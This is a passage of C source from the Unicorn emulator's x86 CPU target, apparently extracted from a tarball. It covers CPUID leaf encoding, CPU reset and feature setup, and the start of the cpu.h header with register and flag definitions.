(L2_ITLB_2M_ENTRIES); *ebx = (AMD_ENC_ASSOC(L2_DTLB_4K_ASSOC) << 28) | \ (L2_DTLB_4K_ENTRIES << 16) | \ (AMD_ENC_ASSOC(L2_ITLB_4K_ASSOC) << 12) | \ (L2_ITLB_4K_ENTRIES); encode_cache_cpuid80000006(env->cache_info_amd.l2_cache, cpu->enable_l3_cache ? env->cache_info_amd.l3_cache : NULL, ecx, edx); break; case 0x80000007: *eax = 0; *ebx = 0; *ecx = 0; *edx = env->features[FEAT_8000_0007_EDX]; break; case 0x80000008: /* virtual & phys address size in low 2 bytes. */ if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { /* 64 bit processor */ *eax = cpu->phys_bits; /* configurable physical bits */ if (env->features[FEAT_7_0_ECX] & CPUID_7_0_ECX_LA57) { *eax |= 0x00003900; /* 57 bits virtual */ } else { *eax |= 0x00003000; /* 48 bits virtual */ } } else { *eax = cpu->phys_bits; } *ebx = env->features[FEAT_8000_0008_EBX]; *ecx = 0; *edx = 0; if (cs->nr_cores * cs->nr_threads > 1) { *ecx |= (cs->nr_cores * cs->nr_threads) - 1; } break; case 0x8000000A: if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { *eax = 0x00000001; /* SVM Revision */ *ebx = 0x00000010; /* nr of ASIDs */ *ecx = 0; *edx = env->features[FEAT_SVM]; /* optional features */ } else { *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; } break; case 0x8000001D: *eax = 0; if (cpu->cache_info_passthrough) { host_cpuid(index, count, eax, ebx, ecx, edx); break; } switch (count) { case 0: /* L1 dcache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l1d_cache, &topo_info, eax, ebx, ecx, edx); break; case 1: /* L1 icache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l1i_cache, &topo_info, eax, ebx, ecx, edx); break; case 2: /* L2 cache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l2_cache, &topo_info, eax, ebx, ecx, edx); break; case 3: /* L3 cache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l3_cache, &topo_info, eax, ebx, ecx, edx); break; default: /* end of info */ *eax = *ebx = *ecx = *edx = 0; break; } break; case 0x8000001E: assert(cpu->core_id <= 255); encode_topo_cpuid8000001e(&topo_info, cpu, eax, ebx, ecx, edx); break; case 0xC0000000: *eax = env->cpuid_xlevel2; *ebx = 0; *ecx = 0; *edx = 0; break; case 0xC0000001: /* Support for VIA CPU's CPUID instruction */ *eax = env->cpuid_version; *ebx = 0; *ecx = 0; *edx = env->features[FEAT_C000_0001_EDX]; break; case 0xC0000002: case 0xC0000003: case 0xC0000004: /* Reserved for the future, and now filled with zero */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; default: /* reserved values: zero */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; } } static void x86_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); X86CPU *cpu = X86_CPU(s); X86CPUClass *xcc = X86_CPU_GET_CLASS(cpu); CPUX86State *env = &cpu->env; target_ulong cr4; uint64_t xcr0; int i; xcc->parent_reset(s); memset(env, 0, offsetof(CPUX86State, end_reset_fields)); env->old_exception = -1; /* init to reset state */ env->hflags2 |= HF2_GIF_MASK; cpu_x86_update_cr0(env, 0x60000010); env->a20_mask = ~0x0; env->smbase = 0x30000; env->msr_smi_count = 0; env->idt.limit = 0xffff; env->gdt.limit = 0xffff; env->ldt.limit = 0xffff; env->ldt.flags = DESC_P_MASK | (2 << DESC_TYPE_SHIFT); env->tr.limit = 0xffff; env->tr.flags = DESC_P_MASK | (11 << DESC_TYPE_SHIFT); cpu_x86_load_seg_cache(env, R_CS, 0xf000, 0xffff0000, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); env->eip = 0xfff0; env->regs[R_EDX] = env->cpuid_version; env->eflags = 0x2; /* FPU init */ for (i = 0; i < 8; i++) { env->fptags[i] = 1; } cpu_set_fpuc(env, 0x37f); env->mxcsr = 0x1f80; /* All units are in INIT state. */ env->xstate_bv = 0; env->pat = 0x0007040600070406ULL; env->msr_ia32_misc_enable = MSR_IA32_MISC_ENABLE_DEFAULT; if (env->features[FEAT_1_ECX] & CPUID_EXT_MONITOR) { env->msr_ia32_misc_enable |= MSR_IA32_MISC_ENABLE_MWAIT; } memset(env->dr, 0, sizeof(env->dr)); env->dr[6] = DR6_FIXED_1; env->dr[7] = DR7_FIXED_1; cpu_breakpoint_remove_all(s, BP_CPU); cpu_watchpoint_remove_all(s, BP_CPU); cr4 = 0; xcr0 = XSTATE_FP_MASK; /* Enable all the features for user-mode. */ if (env->features[FEAT_1_EDX] & CPUID_SSE) { xcr0 |= XSTATE_SSE_MASK; } for (i = 2; i < ARRAY_SIZE(x86_ext_save_areas); i++) { const ExtSaveArea *esa = &x86_ext_save_areas[i]; if (env->features[esa->feature] & esa->bits) { xcr0 |= 1ull << i; } } if (env->features[FEAT_1_ECX] & CPUID_EXT_XSAVE) { cr4 |= CR4_OSFXSR_MASK | CR4_OSXSAVE_MASK; } if (env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_FSGSBASE) { cr4 |= CR4_FSGSBASE_MASK; } env->xcr0 = xcr0; cpu_x86_update_cr4(env, cr4); /* * SDM 11.11.5 requires: * - IA32_MTRR_DEF_TYPE MSR.E = 0 * - IA32_MTRR_PHYSMASKn.V = 0 * All other bits are undefined. For simplification, zero it all. */ env->mtrr_deftype = 0; memset(env->mtrr_var, 0, sizeof(env->mtrr_var)); memset(env->mtrr_fixed, 0, sizeof(env->mtrr_fixed)); } static void mce_init(X86CPU *cpu) { CPUX86State *cenv = &cpu->env; unsigned int bank; if (((cenv->cpuid_version >> 8) & 0xf) >= 6 && (cenv->features[FEAT_1_EDX] & (CPUID_MCE | CPUID_MCA)) == (CPUID_MCE | CPUID_MCA)) { cenv->mcg_cap = MCE_CAP_DEF | MCE_BANKS_DEF | (cpu->enable_lmce ? MCG_LMCE_P : 0); cenv->mcg_ctl = ~(uint64_t)0; for (bank = 0; bank < MCE_BANKS_DEF; bank++) { cenv->mce_banks[bank * 4] = ~(uint64_t)0; } } } static void x86_cpu_adjust_level(X86CPU *cpu, uint32_t *min, uint32_t value) { if (*min < value) { *min = value; } } /* Increase cpuid_min_{level,xlevel,xlevel2} automatically, if appropriate */ static void x86_cpu_adjust_feat_level(X86CPU *cpu, FeatureWord w) { CPUX86State *env = &cpu->env; FeatureWordInfo *fi = &feature_word_info[w]; uint32_t eax = fi->cpuid.eax; uint32_t region = eax & 0xF0000000; assert(feature_word_info[w].type == CPUID_FEATURE_WORD); if (!env->features[w]) { return; } switch (region) { case 0x00000000: x86_cpu_adjust_level(cpu, &env->cpuid_min_level, eax); break; case 0x80000000: x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel, eax); break; case 0xC0000000: x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel2, eax); break; } if (eax == 7) { x86_cpu_adjust_level(cpu, &env->cpuid_min_level_func7, fi->cpuid.ecx); } } /* Calculate XSAVE components based on the configured CPU feature flags */ static void x86_cpu_enable_xsave_components(X86CPU *cpu) { CPUX86State *env = &cpu->env; int i; uint64_t mask; if (!(env->features[FEAT_1_ECX] & CPUID_EXT_XSAVE)) { return; } mask = 0; for (i = 0; i < ARRAY_SIZE(x86_ext_save_areas); i++) { const ExtSaveArea *esa = &x86_ext_save_areas[i]; if (env->features[esa->feature] & esa->bits) { mask |= (1ULL << i); } } env->features[FEAT_XSAVE_COMP_LO] = mask; env->features[FEAT_XSAVE_COMP_HI] = mask >> 32; } /***** Steps involved on loading and filtering CPUID data * * When initializing and realizing a CPU object, the steps * involved in setting up CPUID data are: * * 1) Loading CPU model definition (X86CPUDefinition). This is * implemented by x86_cpu_load_model() and should be completely * transparent, as it is done automatically by instance_init. * No code should need to look at X86CPUDefinition structs * outside instance_init. * * 2) CPU expansion. This is done by realize before CPUID * filtering, and will make sure host/accelerator data is * loaded for CPU models that depend on host capabilities * (e.g. "host"). Done by x86_cpu_expand_features(). * * 3) CPUID filtering. This initializes extra data related to * CPUID, and checks if the host supports all capabilities * required by the CPU. Runnability of a CPU model is * determined at this step. Done by x86_cpu_filter_features(). * * Some operations don't require all steps to be performed. * More precisely: * * - CPU instance creation (instance_init) will run only CPU * model loading. CPU expansion can't run at instance_init-time * because host/accelerator data may be not available yet. * - CPU realization will perform both CPU model expansion and CPUID * filtering, and return an error in case one of them fails. * - query-cpu-definitions needs to run all 3 steps. It needs * to run CPUID filtering, as the 'unavailable-features' * field is set based on the filtering results. * - The query-cpu-model-expansion QMP command only needs to run * CPU model loading and CPU expansion. It should not filter * any CPUID data based on host capabilities. */ /* Expand CPU configuration data, based on configured features * and host/accelerator capabilities when appropriate. */ static void x86_cpu_expand_features(X86CPU *cpu) { CPUX86State *env = &cpu->env; FeatureWord w; /*TODO: Now cpu->max_features doesn't overwrite features * set using QOM properties, and we can convert * plus_features & minus_features to global properties * inside x86_cpu_parse_featurestr() too. */ if (cpu->max_features) { for (w = 0; w < FEATURE_WORDS; w++) { /* Override only features that weren't set explicitly * by the user. */ env->features[w] |= x86_cpu_get_supported_feature_word(w, cpu->migratable) & ~env->user_features[w] & \ ~feature_word_info[w].no_autoenable_flags; } } env->features[FEAT_KVM] = 0; x86_cpu_enable_xsave_components(cpu); /* CPUID[EAX=7,ECX=0].EBX always increased level automatically: */ x86_cpu_adjust_feat_level(cpu, FEAT_7_0_EBX); if (cpu->full_cpuid_auto_level) { x86_cpu_adjust_feat_level(cpu, FEAT_1_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_1_ECX); x86_cpu_adjust_feat_level(cpu, FEAT_6_EAX); x86_cpu_adjust_feat_level(cpu, FEAT_7_0_ECX); x86_cpu_adjust_feat_level(cpu, FEAT_7_1_EAX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0001_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0001_ECX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0007_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0008_EBX); x86_cpu_adjust_feat_level(cpu, FEAT_C000_0001_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_SVM); x86_cpu_adjust_feat_level(cpu, FEAT_XSAVE); /* Intel Processor Trace requires CPUID[0x14] */ if ((env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_INTEL_PT)) { if (cpu->intel_pt_auto_level) { x86_cpu_adjust_level(cpu, &cpu->env.cpuid_min_level, 0x14); } else if (cpu->env.cpuid_min_level < 0x14) { // TODO: Add a warning? // mark_unavailable_features(cpu, FEAT_7_0_EBX, // CPUID_7_0_EBX_INTEL_PT, // "Intel PT need CPUID leaf 0x14, please set by \"-cpu ...,+intel-pt,level=0x14\""); } } /* CPU topology with multi-dies support requires CPUID[0x1F] */ if (env->nr_dies > 1) { x86_cpu_adjust_level(cpu, &env->cpuid_min_level, 0x1F); } /* SVM requires CPUID[0x8000000A] */ if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel, 0x8000000A); } /* SEV requires CPUID[0x8000001F] */ // if (sev_enabled()) { // x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel, 0x8000001F); // } } /* Set cpuid_*level* based on cpuid_min_*level, if not explicitly set */ if (env->cpuid_level_func7 == UINT32_MAX) { env->cpuid_level_func7 = env->cpuid_min_level_func7; } if (env->cpuid_level == UINT32_MAX) { env->cpuid_level = env->cpuid_min_level; } if (env->cpuid_xlevel == UINT32_MAX) { env->cpuid_xlevel = env->cpuid_min_xlevel; } if (env->cpuid_xlevel2 == UINT32_MAX) { env->cpuid_xlevel2 = env->cpuid_min_xlevel2; } } /* * Finishes initialization of CPUID data, filters CPU feature * words based on host availability of each feature. * * Returns: 0 if all flags are supported by the host, non-zero otherwise. */ static void x86_cpu_filter_features(X86CPU *cpu, bool verbose) { CPUX86State *env = &cpu->env; FeatureWord w; const char *prefix = NULL; for (w = 0; w < FEATURE_WORDS; w++) { uint64_t host_feat = x86_cpu_get_supported_feature_word(w, false); uint64_t requested_features = env->features[w]; uint64_t unavailable_features = requested_features & ~host_feat; mark_unavailable_features(cpu, w, unavailable_features, prefix); } } static void x86_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); X86CPU *cpu = X86_CPU(cs); X86CPUClass *xcc = X86_CPU_GET_CLASS(cs); CPUX86State *env = &cpu->env; if (cpu->ucode_rev == 0) { /* The default is the same as KVM's. */ if (IS_AMD_CPU(env)) { cpu->ucode_rev = 0x01000065; } else { cpu->ucode_rev = 0x100000000ULL; } } /* mwait extended info: needed for Core compatibility */ /* We always wake on interrupt even if host does not have the capability */ cpu->mwait.ecx |= CPUID_MWAIT_EMX | CPUID_MWAIT_IBE; if (cpu->apic_id == UNASSIGNED_APIC_ID) { //error_setg(errp, "apic-id property was not initialized properly"); return; } x86_cpu_expand_features(cpu); x86_cpu_filter_features(cpu, cpu->check_cpuid || cpu->enforce_cpuid); if (cpu->enforce_cpuid && x86_cpu_have_filtered_features(cpu)) { // error_setg(&local_err, // accel_uses_host_cpuid() ? // "Host doesn't support requested features" : // "TCG doesn't support requested features"); return; } /* On AMD CPUs, some CPUID[8000_0001].EDX bits must match the bits on * CPUID[1].EDX. */ if (IS_AMD_CPU(env)) { env->features[FEAT_8000_0001_EDX] &= ~CPUID_EXT2_AMD_ALIASES; env->features[FEAT_8000_0001_EDX] |= (env->features[FEAT_1_EDX] & CPUID_EXT2_AMD_ALIASES); } /* For 64bit systems think about the number of physical bits to present. * ideally this should be the same as the host; anything other than matching * the host can cause incorrect guest behaviour. * QEMU used to pick the magic value of 40 bits that corresponds to * consumer AMD devices but nothing else. */ if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { if (cpu->phys_bits && cpu->phys_bits != TCG_PHYS_ADDR_BITS) { //error_setg(errp, "TCG only supports phys-bits=%u", // TCG_PHYS_ADDR_BITS); return; } /* 0 means it was not explicitly set by the user (or by machine * compat_props or by the host code above). In this case, the default * is the value used by TCG (40). */ if (cpu->phys_bits == 0) { cpu->phys_bits = TCG_PHYS_ADDR_BITS; } } else { /* For 32 bit systems don't use the user set value, but keep * phys_bits consistent with what we tell the guest. */ if (cpu->phys_bits != 0) { //error_setg(errp, "phys-bits is not user-configurable in 32 bit"); return; } if (env->features[FEAT_1_EDX] & CPUID_PSE36) { cpu->phys_bits = 36; } else { cpu->phys_bits = 32; } } /* Cache information initialization */ if (!cpu->legacy_cache) { if (!xcc->model || !xcc->model->cpudef->cache_info) { // g_autofree char *name = x86_cpu_class_get_model_name(xcc); //error_setg(errp, // "CPU model '%s' doesn't support legacy-cache=off", name); return; } env->cache_info_cpuid2 = env->cache_info_cpuid4 = env->cache_info_amd = *xcc->model->cpudef->cache_info; } else { /* Build legacy cache information */ env->cache_info_cpuid2.l1d_cache = &legacy_l1d_cache; env->cache_info_cpuid2.l1i_cache = &legacy_l1i_cache; env->cache_info_cpuid2.l2_cache = &legacy_l2_cache_cpuid2; env->cache_info_cpuid2.l3_cache = &legacy_l3_cache; env->cache_info_cpuid4.l1d_cache = &legacy_l1d_cache; env->cache_info_cpuid4.l1i_cache = &legacy_l1i_cache; env->cache_info_cpuid4.l2_cache = &legacy_l2_cache; env->cache_info_cpuid4.l3_cache = &legacy_l3_cache; env->cache_info_amd.l1d_cache = &legacy_l1d_cache_amd; env->cache_info_amd.l1i_cache = &legacy_l1i_cache_amd; env->cache_info_amd.l2_cache = &legacy_l2_cache_amd; env->cache_info_amd.l3_cache = &legacy_l3_cache; } cpu_exec_realizefn(cs); mce_init(cpu); cpu_reset(cs); } static void x86_cpu_initfn(struct uc_struct *uc, CPUState *obj) { X86CPU *cpu = X86_CPU(obj); X86CPUClass *xcc = X86_CPU_GET_CLASS(obj); CPUX86State *env = &cpu->env; env->nr_dies = 1; env->nr_nodes = 1; cpu_set_cpustate_pointers(cpu); env->uc = uc; if (xcc->model) { x86_cpu_load_model(cpu, xcc->model); } } static int64_t x86_cpu_get_arch_id(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); return cpu->apic_id; } static bool x86_cpu_get_paging_enabled(const CPUState *cs) { X86CPU *cpu = X86_CPU(cs); return cpu->env.cr[0] & CR0_PG_MASK; } static void x86_cpu_set_pc(CPUState *cs, vaddr value) { X86CPU *cpu = X86_CPU(cs); cpu->env.eip = value; } static void x86_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { X86CPU *cpu = X86_CPU(cs); cpu->env.eip = tb->pc - tb->cs_base; } int x86_cpu_pending_interrupt(CPUState *cs, int interrupt_request) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; if (interrupt_request & CPU_INTERRUPT_POLL) { return CPU_INTERRUPT_POLL; } if (interrupt_request & CPU_INTERRUPT_SIPI) { return CPU_INTERRUPT_SIPI; } if (env->hflags2 & HF2_GIF_MASK) { if ((interrupt_request & CPU_INTERRUPT_SMI) && !(env->hflags & HF_SMM_MASK)) { return CPU_INTERRUPT_SMI; } else if ((interrupt_request & CPU_INTERRUPT_NMI) && !(env->hflags2 & HF2_NMI_MASK)) { return CPU_INTERRUPT_NMI; } else if (interrupt_request & CPU_INTERRUPT_MCE) { return CPU_INTERRUPT_MCE; } else if ((interrupt_request & CPU_INTERRUPT_HARD) && (((env->hflags2 & HF2_VINTR_MASK) && (env->hflags2 & HF2_HIF_MASK)) || (!(env->hflags2 & HF2_VINTR_MASK) && (env->eflags & IF_MASK && !(env->hflags & HF_INHIBIT_IRQ_MASK))))) { return CPU_INTERRUPT_HARD; } else if ((interrupt_request & CPU_INTERRUPT_VIRQ) && (env->eflags & IF_MASK) && !(env->hflags & HF_INHIBIT_IRQ_MASK)) { return CPU_INTERRUPT_VIRQ; } } return 0; } static bool x86_cpu_has_work(CPUState *cs) { return x86_cpu_pending_interrupt(cs, cs->interrupt_request) != 0; } void x86_update_hflags(CPUX86State *env) { uint32_t hflags; #define HFLAG_COPY_MASK \ ~( HF_CPL_MASK | HF_PE_MASK | HF_MP_MASK | HF_EM_MASK | \ HF_TS_MASK | HF_TF_MASK | HF_VM_MASK | HF_IOPL_MASK | \ HF_OSFXSR_MASK | HF_LMA_MASK | HF_CS32_MASK | \ HF_SS32_MASK | HF_CS64_MASK | HF_ADDSEG_MASK) hflags = env->hflags & HFLAG_COPY_MASK; hflags |= (env->segs[R_SS].flags >> DESC_DPL_SHIFT) & HF_CPL_MASK; hflags |= (env->cr[0] & CR0_PE_MASK) << (HF_PE_SHIFT - CR0_PE_SHIFT); hflags |= (env->cr[0] << (HF_MP_SHIFT - CR0_MP_SHIFT)) & (HF_MP_MASK | HF_EM_MASK | HF_TS_MASK); hflags |= (env->eflags & (HF_TF_MASK | HF_VM_MASK | HF_IOPL_MASK)); if (env->cr[4] & CR4_OSFXSR_MASK) { hflags |= HF_OSFXSR_MASK; } if (env->efer & MSR_EFER_LMA) { hflags |= HF_LMA_MASK; } if ((hflags & HF_LMA_MASK) && (env->segs[R_CS].flags & DESC_L_MASK)) { hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK; } else { hflags |= (env->segs[R_CS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_CS32_SHIFT); hflags |= (env->segs[R_SS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_SS32_SHIFT); if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK) || !(hflags & HF_CS32_MASK)) { hflags |= HF_ADDSEG_MASK; } else { hflags |= ((env->segs[R_DS].base | env->segs[R_ES].base | env->segs[R_SS].base) != 0) << HF_ADDSEG_SHIFT; } } env->hflags = hflags; } static void x86_cpu_common_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { X86CPUClass *xcc = X86_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ xcc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: x86_cpu_reset(). */ cc->reset = x86_cpu_reset; cc->has_work = x86_cpu_has_work; cc->do_interrupt = x86_cpu_do_interrupt; cc->cpu_exec_interrupt = x86_cpu_exec_interrupt; cc->set_pc = x86_cpu_set_pc; cc->synchronize_from_tb = x86_cpu_synchronize_from_tb; cc->get_arch_id = x86_cpu_get_arch_id; cc->get_paging_enabled = x86_cpu_get_paging_enabled; cc->asidx_from_attrs = x86_asidx_from_attrs; cc->get_memory_mapping = x86_cpu_get_memory_mapping; cc->get_phys_page_attrs_debug = x86_cpu_get_phys_page_attrs_debug; cc->debug_excp_handler = breakpoint_handler; cc->cpu_exec_enter = x86_cpu_exec_enter; cc->cpu_exec_exit = x86_cpu_exec_exit; cc->tcg_initialize = tcg_x86_init; cc->tlb_fill_cpu = x86_cpu_tlb_fill; } X86CPU *cpu_x86_init(struct uc_struct *uc) { X86CPU *cpu; CPUState *cs; CPUClass *cc; X86CPUClass *xcc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { #ifdef TARGET_X86_64 uc->cpu_model = UC_CPU_X86_QEMU64; // qemu64 #else uc->cpu_model = UC_CPU_X86_QEMU32; // qemu32 #endif } else if (uc->cpu_model >= ARRAY_SIZE(builtin_x86_defs)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; cpu->env.cpuid_level_func7 = UINT32_MAX; cpu->env.cpuid_level = UINT32_MAX; cpu->env.cpuid_xlevel = UINT32_MAX; cpu->env.cpuid_xlevel2 = UINT32_MAX; /* init CPUClass */ cpu_class_init(uc, cc); /* init X86CPUClass */ x86_cpu_common_class_init(uc, cc, NULL); /* init X86CPUModel */ /* Ignore X86CPUVersion, X86CPUVersionDefinition. we do not need so many cpu types and their property. version: more typename. x86_cpu_versioned_model_name(). alias: more property. */ xcc = &cpu->cc; xcc->model = calloc(1, sizeof(*(xcc->model))); if (xcc->model == NULL) { free(cpu); return NULL; } xcc->model->version = CPU_VERSION_AUTO; xcc->model->cpudef = &builtin_x86_defs[uc->cpu_model]; if (xcc->model->cpudef == NULL) { free(xcc->model); free(cpu); return NULL; } /* init CPUState */ cpu_common_initfn(uc, cs); /* init X86CPU */ x86_cpu_initfn(uc, cs); /* realize X86CPU */ x86_cpu_realizefn(uc, cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); /* realize CPUState */ return cpu; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/cpu.h����������������������������������������������������������������0000664�0000000�0000000�00000217055�14675241067�0017104�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 virtual CPU header * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef I386_CPU_H #define I386_CPU_H #include "sysemu/tcg.h" #include "cpu-qom.h" #include "exec/cpu-defs.h" /* The x86 has a strong memory model with some store-after-load re-ordering */ #define TCG_GUEST_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) /* Maximum instruction code size */ #define TARGET_MAX_INSN_SIZE 16 /* support for self modifying code even if the modified instruction is close to the modifying instruction */ #define TARGET_HAS_PRECISE_SMC #ifdef TARGET_X86_64 #define I386_ELF_MACHINE EM_X86_64 #define ELF_MACHINE_UNAME "x86_64" #else #define I386_ELF_MACHINE EM_386 #define ELF_MACHINE_UNAME "i686" #endif enum { R_EAX = 0, R_ECX = 1, R_EDX = 2, R_EBX = 3, R_ESP = 4, R_EBP = 5, R_ESI = 6, R_EDI = 7, R_R8 = 8, R_R9 = 9, R_R10 = 10, R_R11 = 11, R_R12 = 12, R_R13 = 13, R_R14 = 14, R_R15 = 15, R_AL = 0, R_CL = 1, R_DL = 2, R_BL = 3, R_AH = 4, R_CH = 5, R_DH = 6, R_BH = 7, }; typedef enum X86Seg { R_ES = 0, R_CS = 1, R_SS = 2, R_DS = 3, R_FS = 4, R_GS = 5, R_LDTR = 6, R_TR = 7, } X86Seg; /* segment descriptor fields */ #define DESC_G_SHIFT 23 #define DESC_G_MASK (1 << DESC_G_SHIFT) #define DESC_B_SHIFT 22 #define DESC_B_MASK (1 << DESC_B_SHIFT) #define DESC_L_SHIFT 21 /* x86_64 only : 64 bit code segment */ #define DESC_L_MASK (1 << DESC_L_SHIFT) #define DESC_AVL_SHIFT 20 #define DESC_AVL_MASK (1 << DESC_AVL_SHIFT) #define DESC_P_SHIFT 15 #define DESC_P_MASK (1 << DESC_P_SHIFT) #define DESC_DPL_SHIFT 13 #define DESC_DPL_MASK (3 << DESC_DPL_SHIFT) #define DESC_S_SHIFT 12 #define DESC_S_MASK (1 << DESC_S_SHIFT) #define DESC_TYPE_SHIFT 8 #define DESC_TYPE_MASK (15 << DESC_TYPE_SHIFT) #define DESC_A_MASK (1 << 8) #define DESC_CS_MASK (1 << 11) /* 1=code segment 0=data segment */ #define DESC_C_MASK (1 << 10) /* code: conforming */ #define DESC_R_MASK (1 << 9) /* code: readable */ #define DESC_E_MASK (1 << 10) /* data: expansion direction */ #define DESC_W_MASK (1 << 9) /* data: writable */ #define DESC_TSS_BUSY_MASK (1 << 9) /* eflags masks */ #define CC_C 0x0001 #define CC_P 0x0004 #define CC_A 0x0010 #define CC_Z 0x0040 #define CC_S 0x0080 #define CC_O 0x0800 #define TF_SHIFT 8 #define IOPL_SHIFT 12 #define VM_SHIFT 17 #define TF_MASK 0x00000100 #define IF_MASK 0x00000200 #define DF_MASK 0x00000400 #define IOPL_MASK 0x00003000 #define NT_MASK 0x00004000 #define RF_MASK 0x00010000 #define VM_MASK 0x00020000 #define AC_MASK 0x00040000 #define VIF_MASK 0x00080000 #define VIP_MASK 0x00100000 #define ID_MASK 0x00200000 /* hidden flags - used internally by qemu to represent additional cpu states. Only the INHIBIT_IRQ, SMM and SVMI are not redundant. We avoid using the IOPL_MASK, TF_MASK, VM_MASK and AC_MASK bit positions to ease oring with eflags. */ /* current cpl */ #define HF_CPL_SHIFT 0 /* true if hardware interrupts must be disabled for next instruction */ #define HF_INHIBIT_IRQ_SHIFT 3 /* 16 or 32 segments */ #define HF_CS32_SHIFT 4 #define HF_SS32_SHIFT 5 /* zero base for DS, ES and SS : can be '0' only in 32 bit CS segment */ #define HF_ADDSEG_SHIFT 6 /* copy of CR0.PE (protected mode) */ #define HF_PE_SHIFT 7 #define HF_TF_SHIFT 8 /* must be same as eflags */ #define HF_MP_SHIFT 9 /* the order must be MP, EM, TS */ #define HF_EM_SHIFT 10 #define HF_TS_SHIFT 11 #define HF_IOPL_SHIFT 12 /* must be same as eflags */ #define HF_LMA_SHIFT 14 /* only used on x86_64: long mode active */ #define HF_CS64_SHIFT 15 /* only used on x86_64: 64 bit code segment */ #define HF_RF_SHIFT 16 /* must be same as eflags */ #define HF_VM_SHIFT 17 /* must be same as eflags */ #define HF_AC_SHIFT 18 /* must be same as eflags */ #define HF_SMM_SHIFT 19 /* CPU in SMM mode */ #define HF_SVME_SHIFT 20 /* SVME enabled (copy of EFER.SVME) */ #define HF_GUEST_SHIFT 21 /* SVM intercepts are active */ #define HF_OSFXSR_SHIFT 22 /* CR4.OSFXSR */ #define HF_SMAP_SHIFT 23 /* CR4.SMAP */ #define HF_IOBPT_SHIFT 24 /* an io breakpoint enabled */ #define HF_MPX_EN_SHIFT 25 /* MPX Enabled (CR4+XCR0+BNDCFGx) */ #define HF_MPX_IU_SHIFT 26 /* BND registers in-use */ #define HF_CPL_MASK (3 << HF_CPL_SHIFT) #define HF_INHIBIT_IRQ_MASK (1 << HF_INHIBIT_IRQ_SHIFT) #define HF_CS32_MASK (1 << HF_CS32_SHIFT) #define HF_SS32_MASK (1 << HF_SS32_SHIFT) #define HF_ADDSEG_MASK (1 << HF_ADDSEG_SHIFT) #define HF_PE_MASK (1 << HF_PE_SHIFT) #define HF_TF_MASK (1 << HF_TF_SHIFT) #define HF_MP_MASK (1 << HF_MP_SHIFT) #define HF_EM_MASK (1 << HF_EM_SHIFT) #define HF_TS_MASK (1 << HF_TS_SHIFT) #define HF_IOPL_MASK (3 << HF_IOPL_SHIFT) #define HF_LMA_MASK (1 << HF_LMA_SHIFT) #define HF_CS64_MASK (1 << 